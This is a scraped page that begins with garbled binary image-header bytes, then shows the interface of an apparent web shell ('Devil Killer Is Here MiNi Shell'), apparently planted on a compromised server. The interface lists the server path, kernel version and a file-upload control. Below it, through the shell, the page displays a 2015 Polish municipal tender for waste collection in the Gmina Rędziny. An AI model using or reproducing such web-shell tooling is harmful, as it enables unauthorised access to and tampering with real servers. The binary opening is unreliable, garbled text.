JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150213/19967-N-2015.html

<p class="kh_header"><b>Rędziny: Świadczenie usługi odbierania odpadów komunalnych i zagospodarowania tych odpadów od właścicieli nieruchomości na których zamieszkują mieszkańcy powstałych na terenie Gminy Rędziny</b><br>
<b>Numer ogłoszenia: 19967 - 2015; data zamieszczenia: 13.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Wolności 87, 42-242 Rędziny, woj. śląskie, tel. 034 3279014, faks 034 3279085.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.redziny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi odbierania odpadów komunalnych i zagospodarowania tych odpadów od właścicieli nieruchomości na których zamieszkują mieszkańcy powstałych na terenie Gminy Rędziny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
Przedmiotem zamówienia jest 
Świadczenie usługi odbierania odpadów komunalnych i zagospodarowania tych odpadów od właścicieli nieruchomości na których zamieszkują mieszkańcy powstałych na terenie Gminy Rędziny

Zaleca się Wykonawcom sprawdzenie w terenie warunków wykonania zamówienia
Podstawowe dane dotyczące Gminy
1 Przedmiotem zamówienia jest świadczenie usługi odbierania odpadów komunalnych i zagospodarowania tych odpadów od właścicieli nieruchomości na których zamieszkują mieszkańcy, powstałych na terenie Gminy Rędziny
Gmina Rędziny Ilość mieszkańców w gminie 9 925	
Ogólna liczba nieruchomości zamieszkałych tzw punktów odbiorowych w zabudowie jednorodzinnej i wielorodzinnej 2298 jednorodzinne 5 wielorodzinne
Powierzchnia gminy 41,36 km2  	     
Ilość bloków mieszkalnych 15
Ilość punktów w zabudowie jednorodzinnej 2293
2 Wykonawcy zamówienia będą odbierali odpady z nieruchomości z następującą częstotliwością 
21 Zmieszane odpady komunalne
dla nieruchomości zamieszkałych w zabudowie jednorodzinnej raz na miesiąc dla nieruchomości zamieszkałych w zabudowie wielorodzinnej dwa razy w tygodniu
22 Odpady komunalne pochodzące z selektywnej zbiórki obejmującej
1 Zbierane łącznie odpady obejmujące następujące frakcje papier opakowania  wielomateriałowe metal tworzywa sztuczne należy usuwać zgodnie z następującą częstotliwością
dla nieruchomości zamieszkałych w zabudowie jednorodzinnej raz na miesiąc
dla nieruchomości zamieszkałych w zabudowie wielorodzinnej dwa razy w tygodniu dla punktu selektywnego zbierania według potrzeb nie rzadziej niż raz na miesiąc
1 Zbierane odpady obejmujące szkło należy usuwać zgodnie z następującą częstotliwością
dla nieruchomości zamieszkałych w zabudowie jednorodzinnej raz na dwa miesiące
 dla nieruchomości zamieszkałych w zabudowie wielorodzinnej raz na miesiąc
 dla punktu selektywnego zbierania według potrzeb nie rzadziej niż raz na dwa miesiące
 Odpady ulegające biodegradacji gromadzone w pojemnikach do gromadzenia bioodpadów odbierane są 
a z nieruchomości zamieszkałych w zabudowie jednorodzinnej raz na miesiąc
b z nieruchomości zamieszkałych w zabudowie wielorodzinnej dwa razy w tygodniu
c dla punktu selektywnego zbierania według potrzeb nie rzadziej niż raz na miesiąc
 Odpady wielkogabarytowe bezpośrednio z nieruchomości zamieszkałych jeden raz w roku w okresie marzec lub kwiecień
2 Zakres usługi obejmuje
W zakresie zamówienia jest odbiór i zagospodarowanie całego strumienia odpadów komunalnych przekazanych przez właścicieli nieruchomości położonych na terenie Gminy Rędziny, na których zamieszkują mieszkańcy
w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia 
i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania w ramach powierzonego zadania zgodnie z zapisami
1 ustawy z dnia 13 września 1996r o utrzymaniu czystości i porządku w gminach  Dz U z 2013r poz 1399 ze zm 
2 ustawy z dnia 14 grudnia 2012r o odpadach Dz U z 2013 r poz 21 z późn zm
3 uchwały Sejmiku Województwa Śląskiego nr IV2512012 z dnia 24 sierpnia 2012r w sprawie przyjęcia Planu gospodarki odpadami dla Województwa Śląskiego 2014 
4 rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości Dz. U. z 2013, poz. 122
W przypadku zmiany prawa Wykonawca zobowiązany jest do dostosowania przedmiotu zamówienia zgodnie z nowymi zapisami
Wykonawca jest obowiązany przekazać odpady do instalacji posiadającej status regionalnej instalacji do przetwarzania odpadów komunalnych zgodnie z Planem Gospodarki Odpadami dla Województwa Śląskiego lub do instalacji przewidzianych do zastępczej obsługi tego regionu, wskazanych w uchwale w sprawie wykonania wojewódzkiego planu gospodarki odpadami na zasadach określonych w ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach
Uwaga Przedmiotem zamówienia jest odbiór i zagospodarowanie całego strumienia odpadów komunalnych powstałych na terenie gminy Rędziny z nieruchomości zamieszkałych, przy założeniu braku limitu ilości odbieranych odpadów zmieszanych i segregowanych od mieszkańców
Przedmiot zamówienia szczegółowo określa opis przedmiotu zamówienia OPZ stanowiący załącznik nr 7 do SIWZ

3 Odbiór odpadów bezpośrednio z nieruchomości zamieszkałych odbywać się będzie z podziałem na odpady

1 zmieszane odpady komunalne
2 zbierane łącznie odpady obejmujące następujące frakcje papier opakowania wielomateriałowe metal tworzywa sztuczne
3 szkło
4 odpady ulegające biodegradacji 
5 meble i inne odpady wielkogabarytowe
4 Pojemniki kubły lub worki służące do zbierania odpadów komunalnych
1 pojemniki kubły lub worki przeznaczone do selektywnej zbiórki odpadów takie jak
1 Szkło  kolor zielony  napis Szkło
2 Zbierane łącznie frakcje odpadów papier tworzywa sztuczne metal opakowania wielomateriałowe kolor żółty napis Odpady Selektywne
3 biodegradowalne kolor brązowy napis Bioodpady
o pojemności 120 l 240l 360l w przypadku zabudowy jednorodzinnej oraz 1100l w przypadku zabudowy wielorodzinnej
2 pojemniki na odpady zmieszane o pojemności 120 l 240 l 360 lw przypadku zabudowy jednorodzinnej oraz 1100 l w przypadku zabudowy wielorodzinnej Pojemniki wykonane zgodnie 
z obowiązującymi przepisami
Pojemniki na odpady winny być nowe lub w dobrym stanie technicznym używane spełniające obowiązujące normy 
Zapotrzebowanie na pojemniki kubły na odpady zmieszane oraz pojemniki kubły lub worki do selektywnej zbiórki odpadów określone są w załączniku 7 do SIWZ

Wykaz punktów odbiorowych odpadów komunalnych zostanie przekazany Wykonawcy w dniu zawarcia umowy



1 Zadania Wykonawcy związane z zamówieniem.
5 1 Obowiązki Wykonawcy w zakresie harmonogramu
a Przygotowanie harmonogramu wywozu w formie ulotek wydruk czarno biały
w ilości około 2500 sztuk i jego dystrybucja wśród mieszkańców. Ulotki winny zawierać w szczególności: harmonogram odbioru odpadów w okresie obowiązywania umowy łącznie z ustaleniem jednorazowej zbiórki odpadów wielkogabarytowych, informację o  adresie i telefonie Wykonawcy, a także informacje w jaki sposób mieszkańcy mogą dokonywać płatności za gospodarowanie odpadami (numer konta gminy do wniesienia opłaty, godziny otwarcia kasy oraz wpłaty kwartalne 
u sołtysów, poczta, przelewy on-line i terminy płatności oraz inne informacje związane z gospodarką odpadami, które Zamawiający chce przekazać mieszkańcom
b Propozycję harmonogramu wywozu na 2015 rok należy przedstawić Zamawiającemu do czterech dni od dnia zawarcia umowy a na rok 2016 do 20.12.2015 roku
c Pierwsza dystrybucja ulotek z harmonogramem na 2015r winna się odbyć wraz z dostarczeniem pojemników na odpady zmieszane oraz pojemników kubłów lub worków do segregacji w terminie 7 dni od podpisania umowy, na 2016r. do 05.01.2016r. Zamawiający nie dopuszcza przedstawiania harmonogramu w okresach kwartalnych. Obowiązkiem Wykonawcy jest również zamieszczenie harmonogramu odbioru odpadów z terenu gminy Rędziny na stronie internetowej Wykonawcy 
d Przygotowanie i dystrybucja ulotek informacyjnych dotyczących punktów PSZOK wydruk czarno biały w ilości 2900 sztuk 1 raz w roku

           
UWAGA Przez dystrybucję Zamawiający rozumie

w zabudowie jednorodzinnej dostarczenie w.w informacji do skrzynek na listy, a w przypadku braku skrzynki ulotkę należy przykleić do wewnętrznej strony klapy pojemnika.
 w zabudowie wielorodzinnej wywieszenie w.w informacji na tablicach ogłoszeń a w przypadku ich braku w innym miejscu ogólnodostępnym 


5 2 Obowiązki Wykonawcy w zakresie wyposażenia nieruchomości zamieszkałych w pojemniki
a Wykonawca zobowiązany jest do wyposażenia nieruchomości zamieszkałych 
w pojemniki (kubły) do zbierania odpadów komunalnych zmieszanych oraz pojemniki worki lub kubły do selektywnej zbiórki odpadów
b Wykonawca zobowiązany jest wyposażyć PSZOK w odpowiednie pojemniki zapotrzebowanie określone odpowiednio w załączniku 7 do SIWZ Wykonawca zobowiązany będzie również do odbioru odpadów z PSZOK-a. Wykonawca winien na teren PSZOK-a wskazany i przygotowany przez Zamawiającego wstawić swoje kontenery do selektywnego gromadzenia odpadów komunalnych. Wykonawca zobowiązany jest wstawić na teren PSZOK-a (w terminie uzgodnionym z Zamawiającym) pojemniki i kontenery na odpady w stanie technicznym, który nie spowoduje emisji nieczystości do gruntu
Wykonawca zobowiązany jest dokonywać odbiór odpadów z PSZOK-a po zapełnieniu kontenera
z danym odpadem w terminie do 5 dni, licząc od dnia przekazania telefonicznej e mailowej informacji przez Zamawiającego osobie wskazanej do kontaktu po stronie Wykonawcy. 
c Pierwsze wyposażenie nieruchomości w pojemniki na odpady zmieszane oraz pojemniki kubły lub worki do selektywnej zbiórki odpadów winno nastąpić w terminie do siedmiu dni od zawarcia umowy zgodnie z wykazem przekazanym przez Zamawiającego, a następnie na bieżąco winno być realizowane w całym okresie trwania umowy. Zamawiający po  złożeniu przez właściciela deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi dotyczącej nieruchomości, która dotychczas nie była objęta systemem, niezwłocznie poinformuje o tym Wykonawcę

Termin dostarczenia dodatkowych pojemników na odpady zmieszane oraz pojemników kubłów lub worków na odpady segregowane w ciągu trwania umowy niezwłocznie lecz nie później niż w ciągu 3 dni roboczych od daty przyjęcia zgłoszenia

d Zamawiający zastrzega sobie prawo żądania doposażenia nieruchomości w pojemniki kubły lub worki w przypadku ich udokumentowanego zaginięcia lub zniszczenia protokół zniszczenia sporządzony nie później niż w dniu odbioru odpadów  podpisany przez Wykonawcę i właściciela nieruchomości i zdjęcie z datownikiem oraz protokół zaginięcia podpisany przez Wykonawcę i właściciela nieruchomości. Koszty takiego udokumentowanego doposażenia przez Wykonawcę nieruchomości w dodatkowe pojemniki poniesie Zamawiający. Dodatkowe doposażenie w pojemniki zostanie wykazane w comiesięcznym rozliczeniu wykonanych usług
e Zamawiający odpowiada wobec Wykonawcy za
 zniszczenie pojemnika wskutek spalenia lub innego uszkodzenia mechanicznego nie wynikającego z czynności eksploatacji pojemnika
f Zamawiający nie odpowiada za uszkodzenia wynikające ze złej jakości pojemników pęknięć powstałych przy opróżnianiu pojemnika lub zwykłego użytkowania pojemników typu uszkodzone kółka, pokrywy lub uchwyty- w takich przypadkach Wykonawca zobowiązany jest do wymiany pojemnika na własny koszt. 
g Wykonawca zobowiązany jest do wymiany pojemników w trakcie trwania umowy w przypadku zmiany ilości osób zamieszkujących daną nieruchomość pojemnik na większy lub mniejszy zgodnie ze złożoną przez właściciela deklaracją Przypadki takie zgłasza każdorazowo Zamawiający 
h Wykonawca zobowiązany jest dostarczać pojemniki kubły lub worki na odpady zbierane selektywnie do poszczególnych gospodarstw domowych regularnie tj raz na miesiąc w przypadku zbieranych łącznie odpadów obejmujących następujące frakcje papier metal tworzywa sztuczne i opakowania wielomateriałowe oraz  odpadów biodegradowalnych; natomiast na szkło raz na dwa miesiące, w dniu odbioru odpadów. Dostarczenie worków odbywa się bez względu na fakt czy odpady zostały wystawione czy nie i w jakich ilościach. ilość dostarczanych worków do poszczególnych gospodarstw oraz miesięczne zapotrzebowanie określone zostało 
w załączniku nr 7 do SIWZ

5 3  Obowiązki Wykonawcy w zakresie odbioru odpadów komunalnych

a systematyczne opróżnianie pojemników i wywóz odpadów zmieszanych oraz selektywnie zebranych zgodnie z określonymi harmonogramami i częstotliwością wywozu;
b obsługa każdej nieruchomości w terminie określonym w harmonogramie
odebranie od właścicieli nieruchomości zamieszkałych każdej ilości zebranych zmieszanych i segregowanych odpadów komunalnych. Gmina zapewnia właścicielom nieruchomości zamieszkałych odbiór wszystkich odpadów komunalnych bezpośrednio z terenu nieruchomości tj. w przypadku kiedy odpady które nie zmieszczą się do kubła, wystawione będą obok w dodatkowych workach również w ramach niniejszego zamówienia muszą być odebrane. Zamawiający po złożeniu przez właściciela deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi dotyczącej nieruchomości, która dotychczas nie była objęta systemem, niezwłocznie poinformuje Wykonawcę, a ten od najbliższego terminu odbioru odpadów, zgodnie z harmonogramem, zobowiązany jest do rozpoczęcia odbioru odpadów co nie spowoduje podwyższenia wynagrodzenia Wykonawcy. Wykonawca zobowiązany jest odebrać wszystkie odpady komunalne od mieszkańców jak również z PSZOKa.
c zabezpieczanie przewożonych odpadów przed wysypaniem
d zbieranie odpadów leżących luzem obok zapełnionych pojemników oraz  doprowadzenia  do  porządku  terenów  przyległych  tj  terenów  w promieniu  4  metrów  zanieczyszczonych  na  skutek  przepełnienia wymienionych  urządzeń  służących  do  gromadzenia  odpadów - obowiązek  ten  winien  być  realizowany  niezwłocznie  po  opróżnieniu pojemników, worków i  kontenerów;
e wywóz odpadów również w przypadku stwierdzenia niemożności dojazdu do pojemnika przez parkujące pojazdy lub inne przeszkody
f odbiór odpadów komunalnych z miejsc trudno dostępnych do których nie ma możliwości dojazdu śmieciarką. Wykonawca ma obowiązek zorganizowania odbioru odpadów z posesji o utrudnionym dojeździe poprzez zastosowanie pojazdu mniejszego gabarytowo. Wykonawca może wywiązać się z tego obowiązku np poprzez wyznaczenie jednego dnia w miesiącu dla tych posesji oraz odebrania w tym dniu wszystkich odpadów komunalnych. Zamawiający przewiduje, iż na terenie gminy Rędziny jest maksymalnie 40 punktów odbiorowych o utrudnionym dojeździe dla śmieciarki
g przekazywanie odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnych instalacji do przetwarzania odpadów komunalnych wynikających z Planu gospodarki odpadami dla województwa śląskiego
h przekazywanie odebranych od właścicieli nieruchomości zamieszkałych selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami o której mowa w arr 7 ustawy z dnia 14 grudnia 2012 r o odpadach Dz U z 2013 r poz 21
i gospodarowanie odebranymi odpadami w sposób zapewniający wywiązywanie się z powierzonych przez Zamawiającego Wykonawcy obowiązków nałożonych ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach Dz U z 2013 r poz 1399 z późn zm zgodnie z  rozporządzeniami wydanymi na podstawie art 3b ust 2 i art 3c ust 2 ustawy tj
j rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych Dz. U. z 2012 r. poz 645
k rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów Dz U z 2012 r poz 676
l Zapewnienie osiągnięcia odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania zgodnie z art 3 ust 2 pkt 7 art 3b i art 3c ustawy z dnia 13 września 1996r o utrzymaniu czystości i porządku w gminach Dz U z 2012r poz 391, rozporządzeniem Ministra Środowiska z 29 maja 2012r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych, rozporządzeniem Ministra Środowiska z 25 maja 2012r. w sprawie poziomów ograniczania masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów wyłącznie w zakresie powierzonych zadań
m odbiór odpadów zmieszanych i selektywnych ma być dokonywany w osobnym dniu i osobnym taborem samochodowym  z podziałem na odbiór odpadów z pojemników śmieciarkami odpady zmieszane i odbiór odpadów segregowanych pojazdami przystosowanymi do ich odbioru pojazdy skrzyniowe
n Zakazuje się mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odebranymi od właścicieli nieruchomości 


5 4 Obowiązki Wykonawcy w zakresie sprawozdawczości
a bieżące prowadzenie ilościowej i jakościowej ewidencji odpadów zgodnie z przepisami ustawy o odpadach oraz ustawy o utrzymaniu czystości i porządku w gminach;
b przez cały okres trwania Umowy Wykonawca będzie przekazywał Zamawiającemu  raporty miesięczne stanowiące część miesięcznego protokołu odbioru w terminie do 10 dnia miesiąca następującego po miesiącu rozliczeniowym zawierające informacje o
	ilości i rodzaju odpadów komunalnych ilość i pojemność pojemników oraz ilość worków frakcjami zebranych z wyszczególnionych nieruchomości
	adresach nieruchomości z których właściciele nie oddali odpadów komunalnych lub oddali w ilości niewspółmiernej do ilości wykazanych mieszkańców
	ilości przeterminowanych leków i baterii Mg z podziałem na frakcje
	sposobie zagospodarowania odpadów ze wskazaniem instalacji na którą zostały przekazane, potwierdzone kartami przekazania odpadów
	oraz raportów miesięcznych z monitoringu GPS bazującego na systemie pozycjonowania satelitarnego, przedstawiające dane o położeniu pojazdu miejscu postoju i miejscach wyładunku odpadów.

c przez cały okres trwania Umowy Wykonawca będzie przekazywał Zamawiającemu  sprawozdania kwartalne zgodne z art 9n ust 1 do 3 ustawy z dnia 13 września 1996r. o utrzymaniu czystości  i porządku w gminach t.j. Dz U z 201r poz. 1399 ze zm. oraz  z Rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r Dz U z 2012r poz 630 w sprawie wzoru sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi, do końca miesiąca następującego po kwartale, którego dotyczy. Wykonawca przedkłada Zamawiającemu dwa sprawozdania odrębnie dla odpadów odebranych od mieszkańców i odrębnie dla odpadów odebranych z PSZOKa

d przekazywanie kart przekazania odpadów i dowodów wagowych określone Rozporządzeniem Ministra Środowiska z dnia 8 grudnia 2010 r w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów Dz. U. z 2010r poz. 1673

5 5 Obowiązki Wykonawcy w zakresie kontroli rzetelności segregacji
a Wykonawca zamówienia zobowiązany jest do powiadamiania Zamawiającego 
w przypadku niedopełniania przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych
b Wykonawca odbierający odpady komunalne ma obowiązek
1 sporządzić protokół w trzech egzemplarzach zawierający datę adres nieruchomości rodzaj źle wysegregowanych odpadów spisany w miejscu zdarzenia 
2 pozostawić kopię protokołu o źle wysegregowanych odpadach dla właściciela nieruchomości w skrzynce na listy
3 wykonać dokumentację fotograficzną z datownikiem
4 niezwłocznie przekazać Zamawiającemu jeden egzemplarz protokołu dokumentację fotograficzną w wersji elektronicznej lub papierowej wielokolorowa
Odpady takie należy zakwalifikować i odebrać traktując je jako zmieszane
c Wykonawca ma obowiązek powiadomić pisemnie Zamawiającego o każdym przypadku wprowadzania do odpadów komunalnych odpadów z działalności gospodarczej odpadów przemysłowych

5 6 Inne obowiązki Wykonawcy

a wykonanie przedmiotu umowy w sposób fachowy niepowodujący niepotrzebnych przeszkód oraz niedogodności dla mieszkańców
b zapewnienie dla właściwej realizacji przedmiotu umowy przez cały czas trwania umowy dostatecznej liczby środków technicznych gwarantujących terminowe i jakościowe wykonanie zakresu rzeczowego usługi, w liczbie co najmniej takiej, jak w złożonej w postępowaniu przetargowym ofercie
c dostarczanie terminowo wymaganej ilości worków do selektywnej zbiórki
d porządkowanie terenu zanieczyszczonego odpadami wysypanymi z pojemników, kontenerów, worków i pojazdów w trakcie realizacji usługi odbioru wyłącznie z winy Wykonawcy
e wyposażenie własnych pracowników zajmujących się wywozem odpadów w odzież z widocznym logo firmy
f wyposażenie pojazdów do odbierania odpadów w tym odpadów segregowanych, w system monitoringu bazującego na systemie pozycjonowania satelitarnego np. GPS, umożliwiający trwałe zapisywanie o położeniu pojazdu i miejscach postoju oraz system czujników zapisujących dane o miejscach wyładunku odpadów
g telefoniczne zawiadomienie Zamawiającego o każdorazowym rozpoczęciu odbioru odpadów i umożliwienie Zamawiającemu na jego żądanie skontrolowanie masy pojazdu na instalacji odbioru odpadów lub pod wskazanym przez Zamawiającego adresem, telefoniczne zawiadomienie Zamawiającego o każdorazowym zakończeniu odbioru odpadów i umożliwienie Zamawiającemu na jego żądanie skontrolowanie masy pojazdu na instalacji odbioru odpadów lub pod wskazanym przez Zamawiającego adresem. Zamawiający wskaże Wykonawcy wyłonionemu w niniejszym postępowaniu upoważnionego przedstawiciela Gminy wraz z podaniem  numeru  telefonu;
h zapisywanie w sposób umożliwiający odczyt oraz przechowywanie w siedzibie Wykonawcy, przez okres obowiązywania umowy i rok po jej zakończeniu danych pochodzących z systemu monitoringu i systemu czujników. Wykonawca powinien posiadać odpowiedni program umożliwiający odczyt, prezentację oraz analizę przechowywanych danych, które powinny być udostępniane na każde żądanie Zamawiającego; na żądanie Zamawiającego Wykonawca przedstawia dzienny raport (w wersji zarówno papierowej jak i elektronicznej) o położeniu pojazdu, miejscach jego postoju i wyładunku odpadów w instalacji docelowej
i dokonywanie odbioru i transportu odpadów, również w przypadkach, kiedy dojazd do nieruchomości będzie utrudniony z powodu prowadzonych remontów dróg, dojazdów, złych warunków atmosferycznych itp O fakcie braku możliwości dojazdu do nieruchomości z przyczyn określonych powyżej Wykonawca zobowiązany jest niezwłocznie powiadomić Zamawiającego celem uzgodnienia sposobu odbioru odpadów. Wykonawcy nie przysługuje wtedy roszczenie z tytułu wzrostu kosztów realizacji przedmiotu umowy
j okazanie na żądanie Zamawiającego wszelkich dokumentów potwierdzających wykonywanie przedmiotu umowy zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa
k Wykonawca ponosi pełną odpowiedzialność wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy, a powstałe z wyłącznej winy Wykonawcy
l naprawa lub ponoszenie kosztów naprawy szkód wyrządzonych podczas wykonywania usługi wywozu odpadów komunalnych w gminie uszkodzenia chodników i innych urządzeń
m naprawa lub wymiana uszkodzonych w trakcie realizacji umowy pojemników na odpady na własny koszt, jeśli powstały z winy Wykonawcy, w terminie do 3 dni od zgłoszenia w formie telefonicznej lub email przez Zamawiającego
n wykonanie co najmniej trzykrotnie na terenie gminy akcji informacyjnej dystrybucja informacji przygotowanych przez Zamawiającego ulotki informujące o sposobach segregacji, w zakresie prawidłowego postępowania z odpadami
o dostarczenie wszystkim właścicielom nieruchomości zamieszkałych harmonogramu wywozu odpadów komunalnych
